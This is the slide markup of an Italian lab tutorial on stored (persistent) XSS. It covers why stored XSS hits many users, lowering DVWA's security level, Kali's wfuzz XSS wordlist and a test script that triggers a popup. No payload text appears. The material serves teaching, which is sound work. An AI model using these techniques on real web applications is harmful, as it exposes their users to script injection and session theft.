            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>lo utilizza nell’output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> HTML, mette in moto l’attacco. Questa categoria prende il nome di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>persistente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5271FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>in quanto il codice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>viene eseguito ogn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>volta che un web browser visita la pagina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5271FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>«infetta».</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="4897503"/>
            <a:ext cx="7221648" cy="29298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Gli attacchi XSS Stored o persistenti sono molto pericolosi, in quanto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>con un singolo attacco si possono colpire diversi utenti di una data applicazione Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Inoltre, mentre alcuni tipi di XSS riflessi, soprattutto quelli più semplici, possono essere identificati dai web browser tramite specifici filtri mentre gli attacchi XSS persistenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>non possono essere identificati in questo modo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-7896399" y="5895850"/>
            <a:ext cx="15792798" cy="15121604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15121604" w="15792798">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15792798" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15792798" y="15121604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15121604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-9358975">
            <a:off x="13757715" y="-8661010"/>
            <a:ext cx="15792798" cy="15121604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15121604" w="15792798">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15792799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15792799" y="15121604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15121604"/>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765401" y="-1355425"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623525" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1203430" y="557449"/>
            <a:ext cx="7940570" cy="3253840"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10587427" cy="4338453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="10587427" cy="1990725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="5880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Settaggio DVWA e pagina XSS Stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3718905"/>
              <a:ext cx="10225345" cy="609388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3814"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1203430" y="2893547"/>
            <a:ext cx="4858521" cy="20916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Prima di tutto, effettuiamo l'accesso al nostro DVWA e impostiamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>il livello di sicurezza su Low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Dopodichè andiamo sulla sezione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>XXS stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> e visualizziamo il form.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10013414" y="2655079"/>
            <a:ext cx="5147403" cy="2910649"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2910649" w="5147403">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5147403" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5147403" y="2910649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2910649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429624" y="3523192"/>
            <a:ext cx="3015075" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="arrow" len="sm" w="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1182362" y="7452047"/>
            <a:ext cx="7961638" cy="2455131"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2455131" w="7961638">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7961638" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7961638" y="2455130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2455130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 10" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="true">
            <a:off x="3300064" y="5565728"/>
            <a:ext cx="0" cy="1488487"/>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8874">
            <a:off x="6203262" y="-13927222"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623526" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2267259" y="2463549"/>
            <a:ext cx="9072090" cy="3402034"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3402034" w="9072090">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9072090" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9072090" y="3402034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3402034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="512652" y="-200025"/>
            <a:ext cx="16541881" cy="3004185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Kali ha un file di testo con un elenco di script per XSS nella directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>/usr/share/wordlists/wfuzz/Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8453223" y="6939119"/>
            <a:ext cx="9393212" cy="2319181"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2319181" w="9393212">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9393211" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9393211" y="2319181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2319181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="512652" y="7264320"/>
            <a:ext cx="7609340" cy="834390"/>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Roboto Condensed"/>
              </a:rPr>
              <a:t>Useremo uno script della lista per verificare se la pagina è</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>effettivamente vulnerabile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="512652" y="293270"/>
            <a:ext cx="7940570" cy="2510890"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10587427" cy="3347853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="10587427" cy="1000125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="5880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>3.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Script di prova</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2728305"/>
              <a:ext cx="10225345" cy="609388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3814"/>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411260">
            <a:off x="6190990" y="-1811953"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623526" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10065105" y="5985914"/>
            <a:ext cx="7793226" cy="2819546"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2819546" w="7793226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7793226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7793226" y="2819547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2819547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4659631"/>
            <a:ext cx="8729288" cy="5025390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Effettuiamo l'accesso e poi vedremo apparire un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>popup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
